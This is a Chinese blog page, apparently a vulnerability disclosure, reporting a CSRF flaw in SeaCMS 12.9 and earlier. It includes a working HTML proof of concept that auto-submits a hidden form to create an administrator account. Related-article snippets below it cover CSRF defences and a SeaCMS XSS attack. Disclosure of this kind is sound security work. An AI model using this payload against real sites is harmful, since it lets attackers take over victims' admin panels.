seacms <=12.9 CSRF

最新推荐文章于 2024-08-03 19:27:22 发布
最新推荐文章于 2024-08-03 19:27:22 发布
阅读量53 收藏
点赞数
文章标签: csrf 数据库 前端 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/DGS666/article/details/133500442
版权

Vulnerability description

Code audit of SeaCMS reveals CSRF vulnerabilities.

Problem type

Cross-site request forgery

Product

Seacms

Version

Seacms <= V12.9
在这里插入图片描述

Download address

The latest version download address: https://www.seacms.com/download/

Vulnerability verification (漏洞验证)

Construct the poc as follows

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://127.0.0.1/seacms/upload/t9ljh/admin_manager.php?action=add" method="POST">
      <input type="hidden" name="username" value="test" />
      <input type="hidden" name="pwd" value="test" />
      <input type="hidden" name="pwd2" value="test" />
      <input type="hidden" name="groupid" value="1" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

在这里插入图片描述
Save as an HTML file and open it using another browser without storing cookies :
在这里插入图片描述

Simulate victim entering account password
在这里插入图片描述在这里插入图片描述

Added successfully 在这里插入图片描述

DGS666
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CSRF - 前后端分离后带来的新问题
Yuchen 的博客
10-07 3325
CSRF 的传统修复方式 几天前,在阅读一篇极为专业的渗透测试报告时,发现了安全人员汇报了一个严重又常见的问题:CSRF 跨站请求伪造,诚然由于开发者的疏忽,产生 CSRF 的问题的确比较严重,好在发现的早我们可以尽早修复。安全人员是这样建议的: The application should implement anti-CSRF tokens into all requests that pe...
CSRF漏洞详解 一文了解CSRF漏洞
闵行小鱼塘
11-11 2441
本篇总结归纳CSRF漏洞
Seacms V12.9
weixin_65219040的博客
06-18 1022
通过定位file_get_contents()函数:找寻有可控变量的文件: 进入后台这个页面: 因为已经登入后台,所以找存储型的XSS,在扩展中添加广告,友情链接这些地方进行尝试:直接修改海洋cms名称,拼接js, 存储型XSS: 前台页面:尝试添加系统管理员: 构造poc: 在另一浏览器打开: 网页打开admin_template.php,添加参数action=del&filedir=../templets/default/html/../../../test.php。设置打开这个网页就进行自动
防止csrf攻击之token
yezi__6的博客
04-02 628
1.设置随机字符串,尽量大一些 var csrfToken=parseInt(Math.random()*999999,10); ctx.cookies.set('csrfToken',csrfToken) console.log(ctx.cookies.get('csrfToken')) 2.在表单中提交的数据中加入csrfToken if(post){ ctx.rend...
CSRF 保护
guanren8929的博客
07-05 976
简介跨站请求伪造是一种通过伪装授权用户的请求来利用授信网站的恶意漏洞。Django使得防止应用遭到跨站请求伪造攻击变得简单。Django自动为每一个被应用管理的有效用户会话生成一个 CSRF “令牌”,该令牌用于验证授权用户和发起请求者是否是同一个人。任何时候在 Django应用中定义HTML表单,都需要在表单中引入CSRF令牌字段,这样CSRF保护中间件才能够正常验证请求。想要生成包含 CSRF...
Flask的csrf_token的用法
Allen . Liu
09-23 2641
在flask当中,flask-wtf模块时携带csrf校验的,只是需要开启; 如果不开启校验就不需要校验,但是那样不安全。 Csrf是针对与post请求的跨域限制,get请求没有作用 csrf_token的开启 在flask中开启csrf保护 from flask_wtf.csrf import CsrfProtect CsrfProtect(app) csrf也支持惰性加载 f...
CSRF攻击、防止CSRF攻击原理及配置
m0_59860403的博客
04-23 1044
CSRF攻击 当用户在浏览器访问服务器,服务器给用户返回一个表单时,用户的ticket身份凭证会存放在cookie当中,如果用户在提交表单前去浏览病毒网站,病毒网站会窃取cookie信息,获得凭证,此时表单提交的目标也是已知,所以病毒网站会通过post请求模拟用户发送请求,这样用户的财产安全就会受到侵犯。 Security底层防止CSRF攻击方式 当服务器想用户返回一个表单页面的时候,会顺便发送一个隐藏域,存储着tocken,是随机生成的,每次都是不同的,当CSRF攻击时候,虽然ticket凭证信
csrf理解session原理
热门推荐
Love&Share
04-16 1万+
CSRF xss利用站点内的信任用户,csrf通过伪装成受信任用户请求受信任的网站,即攻击者利用目标用户的身份,以目标用户的名义执行某些非法操作 攻击两个重点: 目标用户已经登陆了网站,能够执行网站的功能 目标用户访问了攻击者构造的 url 借助 burpsuite 生成 poc 将 poc 保存至 html 文件中并发布,诱导目标用户访问给文件 PHP会话(session) PHP 会话(session)实现用户登录的实现原理 session 是以文本形式存储到服务端的,php 自动修改 sessi
Django CSRF验证失败
sterson的博客
02-06 974
3,在app的views.py文件中导入from django.template import RequestContext。加入django.middleware.csrf.CsrfViewMiddleware。解决方法之二是不使用csrf验证(不推荐),去掉方法一中所有设置即可。2,在项目 setting.py文件中的MIDDLEWARE。访问被禁止,提示csrf验证失败,请求被中断,如下图。
详解Django的CSRF认证实现
09-20
CSRF(Cross-Site Request Forgery,跨站请求伪造)是一种网络攻击手段,攻击者通过让用户在不知情的情况下发起对受信任网站的恶意请求,利用已登录用户的身份执行非授权的操作。这种攻击通常发生在用户已经登录目标...
csrf绕过Referer技巧-01
09-15
CSRF绕过Referer技巧详解 CSRF(Cross-Site Request Forgery,跨站请求伪造)是一种常见的Web攻击方式,攻击者可以通过构造恶意页面诱骗用户执行非法操作。为了防御CSRF攻击,Web开发者通常会使用Referer头来判断...
django 取消csrf限制的实例
09-17
在Django框架中,CSRF(Cross-site request forgery,跨站请求伪造)是一种重要的安全机制,用于防止恶意第三方在用户浏览器中伪造请求到你的应用。然而,在某些情况下,例如前后端分离的项目或者API接口,你可能...
Flask框架 CSRF 保护实现方法详解
09-18
<input type="hidden" name="csrf_token" value="{{ csrf_token() }}" /> </form> ``` 若需自定义错误响应,可以设置错误处理器: ```python @csrf.error_handler def csrf_error(reason): return render_...
CSRF漏洞的靶场实验
09-19
CSRF(Cross-Site Request Forgery,跨站请求伪造)是一种常见的网络安全漏洞,它允许攻击者在用户已登录且浏览器保持会话状态的情况下,诱使用户执行非本意的操作。在“CSRF漏洞的靶场实验”中,我们将通过实际操作...
pikachu 之CSRF(跨站请求伪造)get和post型
LIU6636LIU的博客
07-23 692
pikachu 之CSRF(跨站请求伪造)get和post型
Python爬虫与MongoDB的完美结合
最新发布
weixin_52392194的博客
08-03 395
我们掌握了在Windows和Linux系统下安装MongoDB,设计适合爬虫存储数据的写入规范,并通过实际爬虫示例展示了如何将爬取到的数据存储到MongoDB中。此外,还进行了MongoDB性能优化,提高了数据存储和查询的效率。
SpringBoot+Vue图书(图书借阅)管理系统-附项目源码与配套文档
m0_74283290的博客
08-03 616
本论文阐述了一套先进的图书管理系统的设计与实现,该系统采用Java语言,结合现代Web开发框架和技术,旨在为图书馆提供高效、灵活且用户友好的资源管理解决方案。系统利用Spring Boot框架为核心,整合MyBatis ORM工具,以及MySQL数据库,构建了一个高性能、可扩展的后端服务。前端界面则采用了Vue.js框架,以提供流畅的用户交互体验。论文首先进行了详尽的需求分析,确定了系统的核心功能,包括图书的添加、编辑、删除、查询,读者的注册、登录、个人信息管理,以及图书的借阅、归还、续借流程。
简单的 mongoDB 学习
qq_19342829的博客
07-31 503
mongodb入门学习整理
python正则匹配<meta name="csrf-token" content="i2E9TRPscxapTN3L3rS8BQvAOhUOsp1yhVaZZCNI">过滤出i2E9TRPscxapTN3L3rS8BQvAOhUOsp1yhVaZZCNI
03-02
string = '<meta name="csrf-token" content="i2E9TRPscxapTN3L3rS8BQvAOhUOsp1yhVaZZCNI">' pattern = r'content="([^"]+)"' match = re.search(pattern, string) if match: result = match.group(1) print...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值